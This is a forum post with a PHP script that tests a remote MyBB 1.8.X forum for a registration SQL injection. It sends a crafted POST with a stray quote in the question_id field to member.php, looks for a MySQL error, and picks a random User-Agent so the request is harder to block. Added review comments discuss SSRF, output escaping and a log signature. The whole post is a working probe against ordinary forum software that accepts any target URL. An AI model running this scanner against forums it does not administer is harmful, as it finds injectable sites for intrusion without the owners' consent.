MyBB 1.8.X SQLi Checker

Тема в разделе MyBB, создана пользователем ERROR404, 31 окт 2015.

  1. ERROR404 Администратор

    <?php
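    // Single-target check for the MyBB 1.8.X registration SQL injection: takes a
    // forum base URL in the "q" query parameter, sends one registration POST to
    // <base>/member.php and reports whether a MySQL syntax error comes back.
    // NOTE(review): this page makes the hosting server send a request to any URL
    // the caller supplies, so wherever it is deployed it needs access control
    // (or an allowlist of the operator's own forums).
    if ( isset( $_GET[ 'q' ] ) && is_string( $_GET[ 'q' ] ) )
    {
      $host = $_GET[ 'q' ];

      // Parse the URL instead of comparing a prefix: a prefix test also accepts
      // values such as "httpfoo" that are not http(s) URLs at all.
      $parts  = parse_url( $host );
      $scheme = ( is_array( $parts ) && isset( $parts[ 'scheme' ] ) ) ? strtolower( $parts[ 'scheme' ] ) : '';

      if ( ( $scheme === 'http' || $scheme === 'https' ) && !empty( $parts[ 'host' ] ) )
      {
        $protocol = $scheme;

        // Removing trailing slashes
        $host = rtrim( $host, '/' );

        // The value came straight from the query string; escape it before it is
        // written into the page so it cannot inject markup (reflected XSS).
        $safeHost = htmlspecialchars( $host, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );

        //Initial SQL Injection check
        $newHost  = $host . '/member.php';
        $data     = "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='";
        $response = SendPost( $newHost, $data );

        if ( $response === false )
        {
          // A failed transfer says nothing about the forum; do not report it as
          // "not vulnerable".
          printf( "%s could not be checked, the request failed.", $safeHost );
        }
        elseif ( strpos( $response, "You have an error in your SQL syntax" ) !== false )
        {
          printf( "%s is vulnerable to MyBB 1.8.X SQL Injection!", $safeHost );
        }
        else
        {
          // This branch only means the MySQL error text was absent from the
          // response. A forum that hides database errors lands here as well, so
          // confirm the installed MyBB version before treating it as patched.
          printf( "%s is not vulnerable to MyBB 1.8.X SQL Injection!", $safeHost );
        }
      }
      else
      {
        echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
      }
    }
    else
    {
      echo "Invalid parameters, are you drunk?";
    }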
    
    /**
     * Return one entry, chosen with rand(), from a fixed pool of eight legacy
     * browser User-Agent strings.
     *
     * The original author's stated purpose is to avoid User-Agent based blocking.
     * The pool is static, so a request carrying one of these exact strings
     * together with the registration POST body is a usable access-log signature.
     *
     * @return string One of the hard-coded User-Agent values.
     */
    function getRandomUserAgent()
    {
      $pool = [
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48",
      ];

      // Inclusive upper bound for rand(): the index of the last pool entry.
      $lastIndex = count( $pool ) - 1;

      return $pool[ rand( 0, $lastIndex ) ];
    }
    
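    /**
     * Send $post as the body of an HTTP POST to $site and return the response.
     *
     * The transfer is limited to http/https, does not follow redirects and is
     * bounded by timeouts, so a caller-supplied URL cannot steer the request to
     * other URL schemes or hang the script on an unresponsive host.
     *
     * @param string       $site Target URL.
     * @param string|array $post Value handed to CURLOPT_POSTFIELDS.
     * @return string|false Response body, or false when the handle cannot be
     *                      created or the transfer fails.
     */
    function SendPost( $site, $post )
    {
      $ch = curl_init();
      if ( $ch === false )
      {
        return false;
      }

      curl_setopt_array( $ch, array(
        CURLOPT_URL             => (string) $site,
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_USERAGENT       => getRandomUserAgent(),
        CURLOPT_POSTFIELDS      => $post,
        // Only plain web protocols; blocks file://, gopher:// and similar.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Redirects are not followed, so the response always comes from $site.
        CURLOPT_FOLLOWLOCATION  => false,
        // Bound the time spent on slow or unreachable hosts.
        CURLOPT_CONNECTTIMEOUT  => 10,
        CURLOPT_TIMEOUT         => 30,
      ) );

      $response = curl_exec( $ch );
      curl_close( $ch );

      return $response;
    }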
    ?>
     
    31 окт 2015 #1